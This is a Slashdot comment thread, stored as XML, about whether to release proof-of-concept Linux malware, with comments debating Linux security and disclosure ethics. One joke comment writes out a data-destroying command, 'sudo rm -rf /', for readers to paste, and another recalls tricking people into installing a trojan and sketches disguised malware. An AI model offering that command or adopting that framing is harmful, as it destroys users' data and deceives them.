You always walk with unencumbered hands, with a makeshift weapon in close reach if necessary (e.g.
keys stuck through your fingers while making a fist); you never use anything that disables your senses (e.g.
headphones) or shows wealth (e.g.
white iPod headphones, texting on your phone); you pay attention to your environment, including what's behind you (long shadows cast by streetlights are very useful for seeing movement behind you); and you NEVER let anyone come into your personal space, even if that means crossing the street ahead of time (you did notice them while they were still far away, right?).
When coming up to a corner, an entrance, or any place where someone could hide and jump out at you, you maintain enough of a distance so you can see what's there and react.
You also pay attention to vehicles on both sides of the street, both parked and moving; if a parked car has people in it, stay away and be aware; if a moving car pulls up, keep your distance and be ready to bolt.
The main point: be aware, and if anyone gets too close, you get the fuck away from them as fast as you can.
Who cares if you look like an idiot?
You don't mess around with these things.
Securing your life is worth a little extra work in certain situations, and it's certainly worth far more than what's in your pockets.
If you're trapped and they just want money, give it up easy (try to distract them by throwing it on the ground and running away, if you can do so without being shot).
If you're trapped and they're just looking to fight someone, don't let them get the first hit -- try to temporarily disable them and get the hell out of there as fast as possible.
This may sound overly paranoid and it may seem like you'll spend your time outside worrying about every detail, but really it's just common sense and becomes automatic after a while (i.e.
takes minimal effort after it becomes habit).
If you use such common sense, you'll find you're actually much less afraid of being out alone in bad areas than if you are completely unprepared for the unexpected.
I'm a white male living right near several projects in the south side of Chicago, in an area where pedestrians are often mugged and attacked, and I've never had any problems walking around at any hour of the night.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279146</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279794</id>
	<title>DO IT... Microsoft would if it was that bad.</title>
	<author>viraltus</author>
	<datestamp>1259606640000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>And if they didn't, I don't think your "malware" is going to destroy Linux community, on the contrary. So go Ahead.</p></htmltext>
<tokenext>And if they did n't , I do n't think your " malware " is going to destroy Linux community , on the contrary .
So go Ahead .</tokentext>
<sentencetext>And if they didn't, I don't think your "malware" is going to destroy Linux community, on the contrary.
So go Ahead.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281428</id>
	<title>Lost me at</title>
	<author>TheUz</author>
	<datestamp>1259669280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p> On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.</p></div><p>This is pretty silly.  Slow news day?</p></div>
	</htmltext>
<tokenext>On the one hand , the way it persists itself in autostart is really nasty , and that is not really a security hole that can be fixed.This is pretty silly .
Slow news day ?</tokentext>
<sentencetext> On the one hand, the way it persists itself in autostart is really nasty, and that is not really a security hole that can be fixed.This is pretty silly.
Slow news day?
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279198</id>
	<title>This is why</title>
	<author>Anonymous</author>
	<datestamp>1259601120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>end users should only run stuff they get through the Ubuntu Software Center.  Never download binaries.  Never download source.  If it's not in the app store, screw it.</p></htmltext>
<tokenext>end users should only run stuff they get through the Ubuntu Software Center .
Never download binaries .
Never download source .
If it 's not in the app store , screw it .</tokentext>
<sentencetext>end users should only run stuff they get through the Ubuntu Software Center.
Never download binaries.
Never download source.
If it's not in the app store, screw it.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278936</id>
	<title>Re:Dear Slashdot</title>
	<author>thecoolbean</author>
	<datestamp>1259598540000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>your analogy utterly fails. Sure it's inflammatory on an emotional and illogical level perhaps, but you'd have to include armor and defenses for the subject into your metaphor for it to even begin to work. A Linux box, or any box for that matter is not a 'hapless pedestrian', it is taken for granted that it has defenses against such 'punches'. Try again</p></htmltext>
<tokenext>your analogy utterly fails .
Sure it 's inflammatory on an emotional and illogical level perhaps , but you 'd have to include armor and defenses for the subject into your metaphor for it to even begin to work .
A Linux box , or any box for that matter is not a 'hapless pedestrian ' , it is taken for granted that it has defenses against such 'punches' .
Try again</tokentext>
<sentencetext>your analogy utterly fails.
Sure it's inflammatory on an emotional and illogical level perhaps, but you'd have to include armor and defenses for the subject into your metaphor for it to even begin to work.
A Linux box, or any box for that matter is not a 'hapless pedestrian', it is taken for granted that it has defenses against such 'punches'.
Try again</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30297310</id>
	<title>Re:Indeed Differences</title>
	<author>Anonymous</author>
	<datestamp>1259596740000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>"Windows XP way :</p><p>Simply click on some random downloaded<nobr> <wbr></nobr>.EXE to install it with full adminsitrative right."</p><p>Uhh but in Windows you can create an account with no  full adminsitrative rights.... DON'T YOU KNOW THAT? OR ARE YOU JUST A TROLL? OR JUST A DUMBFUCK?</p></htmltext>
<tokenext>" Windows XP way : Simply click on some random downloaded .EXE to install it with full adminsitrative right .
" Uhh but in Windows you can create an account with no full adminsitrative rights.... DO N'T YOU KNOW THAT ?
OR ARE YOU JUST A TROLL ?
OR JUST A DUMBFUCK ?</tokentext>
<sentencetext>"Windows XP way :Simply click on some random downloaded .EXE to install it with full adminsitrative right.
"Uhh but in Windows you can create an account with no  full adminsitrative rights.... DON'T YOU KNOW THAT?
OR ARE YOU JUST A TROLL?
OR JUST A DUMBFUCK?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30281576</id>
	<title>Re:Tricking people into doing stupid things.</title>
	<author>Anonymous</author>
	<datestamp>1259671140000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>If the weak ssh keys bug in debian too almost two years for anyone to notice who knows what wonderful goodies are already hidden in random distributions' versions of packages? It's not like anyone of us reads all the source of every packages every time we dist-upgrade.</p></htmltext>
<tokenext>If the weak ssh keys bug in debian too almost two years for anyone to notice who knows what wonderful goodies are already hidden in random distributions ' versions of packages ?
It 's not like anyone of us reads all the source of every packages every time we dist-upgrade .</tokentext>
<sentencetext>If the weak ssh keys bug in debian too almost two years for anyone to notice who knows what wonderful goodies are already hidden in random distributions' versions of packages?
It's not like anyone of us reads all the source of every packages every time we dist-upgrade.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279100</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279550</id>
	<title>Re:Commendable</title>
	<author>martin-boundary</author>
	<datestamp>1259604420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>  1) Newbie Linux users who are having problems with their systems will rpetty
  much run anything as any user you tell them to in a desperate hope to get
  Xorg working again</p></div>
</blockquote><p>
It's actually worse than that. If they're former Windows users (and let's face it, that's most of them) then they'll immediately start manually installing lots of programs from random web sites in the mistaken belief that those versions packaged for their distro are always buggy or just not good enough. Then they complain that their system just doesn't work properly or fails in mysterious ways.
</p><p>
There's a pernicious Windows mindset about always having the latest point release for everything right away, without realizing that the distros first do a lot of customizing of the upstream source.</p></div>
	</htmltext>
<tokenext>1 ) Newbie Linux users who are having problems with their systems will rpetty much run anything as any user you tell them to in a desperate hope to get Xorg working again It 's actually worse than that .
If they 're former Windows users ( and let 's face it , that 's most of them ) then they 'll immediately start manually installing lots of programs from random web sites in the mistaken belief that those versions packaged for their distro are always buggy or just not good enough .
Then they complain that their system just does n't work properly or fails in mysterious ways .
There 's a pernicious Windows mindset about always having the latest point release for everything right away , without realizing that the distros first do a lot of customizing of the upstream source .</tokentext>
<sentencetext>  1) Newbie Linux users who are having problems with their systems will rpetty
  much run anything as any user you tell them to in a desperate hope to get
  Xorg working again

It's actually worse than that.
If they're former Windows users (and let's face it, that's most of them) then they'll immediately start manually installing lots of programs from random web sites in the mistaken belief that those versions packaged for their distro are always buggy or just not good enough.
Then they complain that their system just doesn't work properly or fails in mysterious ways.
There's a pernicious Windows mindset about always having the latest point release for everything right away, without realizing that the distros first do a lot of customizing of the upstream source.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278654</id>
	<title>treat it like any other proof of concept exploit?</title>
	<author>Anonymous</author>
	<datestamp>1259596200000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>Why not treat this code like you would any other proof of concept of a security exploit? if the goal to to prove that security vulnerabilities exist and should be fixed then show this code to whomever it will help actually fix those holes but try not to release it to the public at large while it still represents a real threat. Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running but don't release it as a build your own rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights.</p></htmltext>
<tokenext>Why not treat this code like you would any other proof of concept of a security exploit ?
if the goal to to prove that security vulnerabilities exist and should be fixed then show this code to whomever it will help actually fix those holes but try not to release it to the public at large while it still represents a real threat .
Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running but do n't release it as a build your own rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights .</tokentext>
<sentencetext>Why not treat this code like you would any other proof of concept of a security exploit?
if the goal to to prove that security vulnerabilities exist and should be fixed then show this code to whomever it will help actually fix those holes but try not to release it to the public at large while it still represents a real threat.
Show it to package and distribution maintainers and make recommendations on how they can improve their security configurations to prevent it from running but don't release it as a build your own rootkit tool if it has served its purpose and people are making a serious effort to address the issues it highlights.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562</id>
	<title>I think you've already decided...</title>
	<author>Anonymous</author>
	<datestamp>1259595600000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p>There were two options:<br>1. Release it anonymously and take no credit<br>2. Write about it and get some credit (but then you can't actually release it due to legal issues)</p><p>You can't (and won't) release it now.  If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.</p></htmltext>
<tokenext>There were two options : 1 .
Release it anonymously and take no credit2 .
Write about it and get some credit ( but then you ca n't actually release it due to legal issues ) You ca n't ( and wo n't ) release it now .
If somebody gets attacked with your code , guess who they 're going to prosecute and/or sue .</tokentext>
<sentencetext>There were two options:1.
Release it anonymously and take no credit2.
Write about it and get some credit (but then you can't actually release it due to legal issues)You can't (and won't) release it now.
If somebody gets attacked with your code, guess who they're going to prosecute and/or sue.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279508</id>
	<title>Linux Malware</title>
	<author>Gudeldar</author>
	<datestamp>1259604000000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>Linux malware that requires manual running is trivially easy to do.<br>

Copy and paste: sudo rm -rf<nobr> <wbr></nobr>/<br>
Enter your password<br>
<br>

Come back when you have malware that can remotely infect a target machine without user interaction.</htmltext>
<tokenext>Linux malware that requires manual running is trivially easy to do .
Copy and paste : sudo rm -rf / Enter your password Come back when you have malware that can remotely infect a target machine without user interaction .</tokentext>
<sentencetext>Linux malware that requires manual running is trivially easy to do.
Copy and paste: sudo rm -rf /
Enter your password


Come back when you have malware that can remotely infect a target machine without user interaction.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30283156</id>
	<title>Re:Arrogance... Nothing New.</title>
	<author>Anonymous</author>
	<datestamp>1259682780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>"IBM would have to back door their way in to unlock a system administrator account"... nice story but I think it misses the main point: if IBM can hack OS400 then so can an attacker. So much for being hackproof.</p></htmltext>
<tokenext>" IBM would have to back door their way in to unlock a system administrator account " ... nice story but I think it misses the main point : if IBM can hack OS400 then so can an attacker .
So much for being hackproof .</tokentext>
<sentencetext>"IBM would have to back door their way in to unlock a system administrator account"... nice story but I think it misses the main point: if IBM can hack OS400 then so can an attacker.
So much for being hackproof.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279164</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278768</id>
	<title>Security through obscurity</title>
	<author>zill</author>
	<datestamp>1259597340000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext><p><div class="quote"><p>I was fed up with the general consensus that Linux is oh-so-secure and has no malware.</p></div><p>Just because it's a consensus doesn't mean it's correct. As you have demonstrated, it's very much possible to write malware targeted at Linux.<br> <br>

In fact, there are plenty of viruses and malwares specifically targeted at Linux, and their numbers are rising: <a href="http://www.internetnews.com/dev-news/article.php/3601946" title="internetnews.com" rel="nofollow">http://www.internetnews.com/dev-news/article.php/3601946</a> [internetnews.com] <br>However, because <b>desktop</b> Linux has an extremely small market share, malware for Linux has a correspondingly tiny market share.<br> <br>

Think of it this way, a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux.
But there are a hundred who woke up with the same idea, except they wanted to target Windows. In the end, 101 new malwares are born, with only one of them intended to harm Linux systems.</p></div>
	</htmltext>
<tokenext>I was fed up with the general consensus that Linux is oh-so-secure and has no malware.Just because it 's a consensus does n't mean it 's correct .
As you have demonstrated , it 's very much possible to write malware targeted at Linux .
In fact , there are plenty of viruses and malwares specifically targeted at Linux , and their numbers are rising : http : //www.internetnews.com/dev-news/article.php/3601946 [ internetnews.com ] However , because desktop Linux has an extremely small market share , malware for Linux has a correspondingly tiny market share .
Think of it this way , a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux .
But there are a hundred who woke up with the same idea , except they wanted to target Windows .
In the end , 101 new malwares are born , with only one of them intended to harm Linux systems .</tokentext>
<sentencetext>I was fed up with the general consensus that Linux is oh-so-secure and has no malware.Just because it's a consensus doesn't mean it's correct.
As you have demonstrated, it's very much possible to write malware targeted at Linux.
In fact, there are plenty of viruses and malwares specifically targeted at Linux, and their numbers are rising: http://www.internetnews.com/dev-news/article.php/3601946 [internetnews.com] However, because desktop Linux has an extremely small market share, malware for Linux has a correspondingly tiny market share.
Think of it this way, a few weeks ago you woke up and came up with the idea of writing a piece of potential malware directed at Linux.
But there are a hundred who woke up with the same idea, except they wanted to target Windows.
In the end, 101 new malwares are born, with only one of them intended to harm Linux systems.
	</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30292932</id>
	<title>Re:I think you've already decided...</title>
	<author>Gavagai80</author>
	<datestamp>1259683500000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I can't remember the last time I installed software that didn't come from the repositories or a major trusted site (like google). Unless you convince a distribution to include your malware package, I don't see how you can get anyone to install it -- they'll never even see it.

Sure, someone can set up FTP access to let a hacker do whatever they want... but that's not a security issue, it's a user stupidity issue.</htmltext>
<tokenext>I ca n't remember the last time I installed software that did n't come from the repositories or a major trusted site ( like google ) .
Unless you convince a distribution to include your malware package , I do n't see how you can get anyone to install it -- they 'll never even see it .
Sure , someone can set up FTP access to let a hacker do whatever they want... but that 's not a security issue , it 's a user stupidity issue .</tokentext>
<sentencetext>I can't remember the last time I installed software that didn't come from the repositories or a major trusted site (like google).
Unless you convince a distribution to include your malware package, I don't see how you can get anyone to install it -- they'll never even see it.
Sure, someone can set up FTP access to let a hacker do whatever they want... but that's not a security issue, it's a user stupidity issue.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279680</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279656</id>
	<title>Misplaced priorities</title>
	<author>dontmakemethink</author>
	<datestamp>1259605440000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>You should be BOINC'ing your hot friends, not their computers!</htmltext>
<tokenext>You should be BOINC'ing your hot friends , not their computers !</tokentext>
<sentencetext>You should be BOINC'ing your hot friends, not their computers!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279286</id>
	<title>Re:Commendable</title>
	<author>JDeane</author>
	<datestamp>1259601960000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I remember tricking people into running whack a mole to infect them with sub 7 back in the day lol</p><p>good times, good times...</p><p>If you can convince a user to run some code it really does not matter what OS your on. At that point the security game is over.</p><p>Me if I wanted to target Linux I would make something that would be a double click install for Ubuntu (To me at least it looks like more computer non literate people pick Ubuntu then other distro's) Call it something like Kitten Screen saver, something fuzzy and cute could not possibly be bad lol make up some BS as to why its trying to connect to the internet just in case they are running a firewall hmmm updates for even more fuzzy kittens !!!</p><p>1. Make fuzzy kittens malware<br>2. Trick user into installing malware<br>3. Set up ad server<br>4. Profit!!!</p><p>Hmmm I am missing a step ??? lol</p></htmltext>
<tokenext>I remember tricking people into running whack a mole to infect them with sub 7 back in the day lolgood times , good times...If you can convince a user to run some code it really does not matter what OS your on .
At that point the security game is over.Me if I wanted to target Linux I would make something that would be a double click install for Ubuntu ( To me at least it looks like more computer non literate people pick Ubuntu then other distro 's ) Call it something like Kitten Screen saver , something fuzzy and cute could not possibly be bad lol make up some BS as to why its trying to connect to the internet just in case they are running a firewall hmmm updates for even more fuzzy kittens ! ! ! 1 .
Make fuzzy kittens malware2 .
Trick user into installing malware3 .
Set up ad server4 .
Profit ! ! ! Hmmm I am missing a step ? ? ?
lol</tokentext>
<sentencetext>I remember tricking people into running whack a mole to infect them with sub 7 back in the day lolgood times, good times...If you can convince a user to run some code it really does not matter what OS your on.
At that point the security game is over.Me if I wanted to target Linux I would make something that would be a double click install for Ubuntu (To me at least it looks like more computer non literate people pick Ubuntu then other distro's) Call it something like Kitten Screen saver, something fuzzy and cute could not possibly be bad lol make up some BS as to why its trying to connect to the internet just in case they are running a firewall hmmm updates for even more fuzzy kittens !!!1.
Make fuzzy kittens malware2.
Trick user into installing malware3.
Set up ad server4.
Profit!!!Hmmm I am missing a step ???
lol</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278620</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282054</id>
	<title>No, it would be malware</title>
	<author>CAIMLAS</author>
	<datestamp>1259676120000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>What is it that makes malware, well, malware?</p><p>It's software on your system which you don't want there, didn't ask for, and can't easily get rid of without a significant investment in time and/or knowledge.</p><p>Seems like it fits the definition to me. In Windows, malware usually infests the system (registry, files, processes, etc.), and sometimes it's not all that clandestine about it. This would not be so dissimilar from unwanted software which only remains resident in the user $HOME: due to uniform package manage management and vastly improved upon install scripts/configuration, a reinstall is relatively straight forward (dump package names, reinstall, install packages) and takes a reasonably short period of time (less than a Windows install on its own, for instance). Instead, the offending executable would have to be dug out of $HOME manually (or found with a tool) - either way, it's an agitation and non-trivial if you're unsure of what you're looking for.</p><p>Now, is this malware example particularly trivial and not all that attention grabbing? Yes. How did this make FP?</p></htmltext>
<tokenext>What is it that makes malware , well , malware ? It 's software on your system which you do n't want there , did n't ask for , and ca n't easily get rid of without a significant investment in time and/or knowledge.Seems like it fits the definition to me .
In Windows , malware usually infests the system ( registry , files , processes , etc .
) , and sometimes it 's not all that clandestine about it .
This would not be so dissimilar from unwanted software which only remains resident in the user $ HOME : due to uniform package manage management and vastly improved upon install scripts/configuration , a reinstall is relatively straight forward ( dump package names , reinstall , install packages ) and takes a reasonably short period of time ( less than a Windows install on its own , for instance ) .
Instead , the offending executable would have to be dug out of $ HOME manually ( or found with a tool ) - either way , it 's an agitation and non-trivial if you 're unsure of what you 're looking for.Now , is this malware example particularly trivial and not all that attention grabbing ?
Yes. How did this make FP ?</tokentext>
<sentencetext>What is it that makes malware, well, malware?It's software on your system which you don't want there, didn't ask for, and can't easily get rid of without a significant investment in time and/or knowledge.Seems like it fits the definition to me.
In Windows, malware usually infests the system (registry, files, processes, etc.
), and sometimes it's not all that clandestine about it.
This would not be so dissimilar from unwanted software which only remains resident in the user $HOME: due to uniform package manage management and vastly improved upon install scripts/configuration, a reinstall is relatively straight forward (dump package names, reinstall, install packages) and takes a reasonably short period of time (less than a Windows install on its own, for instance).
Instead, the offending executable would have to be dug out of $HOME manually (or found with a tool) - either way, it's an agitation and non-trivial if you're unsure of what you're looking for.Now, is this malware example particularly trivial and not all that attention grabbing?
Yes. How did this make FP?</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279144</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279308</id>
	<title>This should answer your question</title>
	<author>Anonymous</author>
	<datestamp>1259602080000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>http://en.wikipedia.org/wiki/Morris\_worm</p></htmltext>
<tokenext>http : //en.wikipedia.org/wiki/Morris \ _worm</tokentext>
<sentencetext>http://en.wikipedia.org/wiki/Morris\_worm</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30295936</id>
	<title>Re:I think you've already decided...</title>
	<author>CountBrass</author>
	<datestamp>1259587260000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>"Um, and this is different from a Windows virus how?" is the point of both the article AND the comment you were responding to.</htmltext>
<tokenext>" Um , and this is different from a Windows virus how ?
" is the point of both the article AND the comment you were responding to .</tokentext>
<sentencetext>"Um, and this is different from a Windows virus how?
" is the point of both the article AND the comment you were responding to.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279696</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278854</id>
	<title>Link please?</title>
	<author>Anonymous</author>
	<datestamp>1259597880000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>It's not real if there is no link.</p></htmltext>
<tokenext>It 's not real if there is no link .</tokentext>
<sentencetext>It's not real if there is no link.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278582</id>
	<title>Ethics</title>
	<author>Anonymous</author>
	<datestamp>1259595720000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext>Just releasing linux is an ethical problem. Hell, I can't even print anything since last saturday.</htmltext>
<tokenext>Just releasing linux is an ethical problem .
Hell , I ca n't even print anything since last saturday .</tokentext>
<sentencetext>Just releasing linux is an ethical problem.
Hell, I can't even print anything since last saturday.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278562</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30301008</id>
	<title>BOINC License agreement</title>
	<author>Anonymous</author>
	<datestamp>1259613720000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>The BOINC license agreement states that you will only install BOINC on machines for which you have the premission of the owner of the machine.</p></htmltext>
<tokenext>The BOINC license agreement states that you will only install BOINC on machines for which you have the premission of the owner of the machine .</tokentext>
<sentencetext>The BOINC license agreement states that you will only install BOINC on machines for which you have the premission of the owner of the machine.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30282544</id>
	<title>Re:Security through obscurity</title>
	<author>jabberw0k</author>
	<datestamp>1259679540000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Just because it's [allegedly] a consensus doesn't mean it's correct.</p></div><p>see also: Global Warming</p></div>
	</htmltext>
<tokenext>Just because it 's [ allegedly ] a consensus does n't mean it 's correct.see also : Global Warming</tokentext>
<sentencetext>Just because it's [allegedly] a consensus doesn't mean it's correct.see also: Global Warming
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278768</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30279666</id>
	<title>Re:Dear Slashdot</title>
	<author>Josh Coalson</author>
	<datestamp>1259605620000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext>bad analogies are like waxing a monkey with a rainbow.</htmltext>
<tokenext>bad analogies are like waxing a monkey with a rainbow .</tokentext>
<sentencetext>bad analogies are like waxing a monkey with a rainbow.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278730</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30278808</id>
	<title>Thanks Captain!</title>
	<author>Anonymous</author>
	<datestamp>1259597580000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>"mindless execution of unverified downloads"</p><p>Thanks Captain Obvious, show me a system that would stand up to an attack in that instance. Any user-privilege activity (cron, editing<nobr> <wbr></nobr>.bashrc, etc...) is vulnerable if you throw that in the mix.</p></htmltext>
<tokenext>" mindless execution of unverified downloads " Thanks Captain Obvious , show me a system that would stand up to an attack in that instance .
Any user-privilege activity ( cron , editing .bashrc , etc... ) is vulnerable if you throw that in the mix .</tokentext>
<sentencetext>"mindless execution of unverified downloads"Thanks Captain Obvious, show me a system that would stand up to an attack in that instance.
Any user-privilege activity (cron, editing .bashrc, etc...) is vulnerable if you throw that in the mix.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30280238</id>
	<title>release it!</title>
	<author>someone1234</author>
	<datestamp>1259699520000</datestamp>
	<modclass>Funny</modclass>
	<modscore>2</modscore>
	<htmltext><p>This is an important milestone in the Linux to the Desktop campaign.<br>Without a "healthy malware ecosystem", Linux isn't mature enough to be called a desktop operation system.<br>Think about the AV industry!</p></htmltext>
<tokenext>This is an important milestone in the Linux to the Desktop campaign.Without a " healthy malware ecosystem " , Linux is n't mature enough to be called a desktop operation system.Think about the AV industry !</tokentext>
<sentencetext>This is an important milestone in the Linux to the Desktop campaign.Without a "healthy malware ecosystem", Linux isn't mature enough to be called a desktop operation system.Think about the AV industry!</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_12_01_0025213.30284956</id>
	<title>Indeed Differences</title>
	<author>DrYak</author>
	<datestamp>1259690520000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p><div class="quote"><p>Um, and this is different from a Windows virus how? {...} It's not because your system is any more secure against "CLICK HERE TO WIN FREE XBOX 360" infections.</p></div><p>Windows XP way :</p><ul> <li>Simply click on some random downloaded<nobr> <wbr></nobr>.EXE to install it with full adminsitrative right.</li></ul><p>Linux way :</p><ul> <li>First switch to a priviledged account (gksudo, kdesu, etc.)</li><li>Fire up your distribution package manager (YaST, Synaptic, etc. or zypper, apt-get, etc. for command line lovers)</li><li>Look for desired package in list available from default repository</li><li>Eventually add a new repository if the default one doesn't feature the software you want.</li></ul><p>In short there are 2 main differences between the windows and unices environment :</p><ul> <li>Access rights:<ul> <li>in windows everyone, including the cat running across the keyboard have full admin privileges.</li><li>in linux, mac os X and other unices, users (and cats) have only user-level access and must switch to some other access account to gain further privilege.</li></ul></li><li>Install habits<ul> <li>in windows 99\% of the software is downloaded and installed from random location on the web. That means that the average user is used to download and install random crap.</li><li>in linux 99\% of the sofrware comes from official repositories which have been veted to contain only legitimate software. Users have to go through additional steps to get access to crap. And most user won't bother because it works for them 99\% of the time without having to resort to.</li></ul></li></ul><p>There's another big difference, specific to opensource environment like Linux and BSD (and not other unices):</p><ul> <li>There only exist one single Windows : The windows sold by Microsoft. If some malware works on the black-hat's test PC, it will probably work</li><li>There are countless different distributions of distribution each with subtly different versions of key components. Some malware targetting bug  #263748 on kernel 2.6.30-patch52 of Ubuntora 3.1415 won't necessarily work on other distribution.</li></ul><p>(Although the above only regards malwares exploiting *bugs*, not payload which are simple regular softwares).</p><p>With Vista and Seven, Microsoft has attempted to fix some of these problems. Nonetheless, the fix is still a lot noisy ("Cancel or Allow ?") to the point that some user simply start to blindly "Yes-click-through" and the protecting effect is lost. And users are still trained to install crap by downloading it from random websites.</p><p>With Linux, these advantages become a handicap regarding commercial softwares : They have to target multiple combination of softwares in distributions (unlike open-source software where the package are vetted by the distribution maintainers themselves thanks to the source being available for that puprose). And these software are not just a package in a regular repository, making them inaccessible using the regular method.</p><p>There is indeed no software which is 100\% guaranteed secure.<br>But ! There's still a difference like between putting a real fence around your house and having a dog on one side, and just stick a paper with "don't rob us" written on it on the other side.</p><p>And, no matter what, some users will always find a way to shoot themselves in foot.<br>But on Unix, the gun is locked behind a glass door and must have a security pin removed before being able to shoot the foot, whereas on 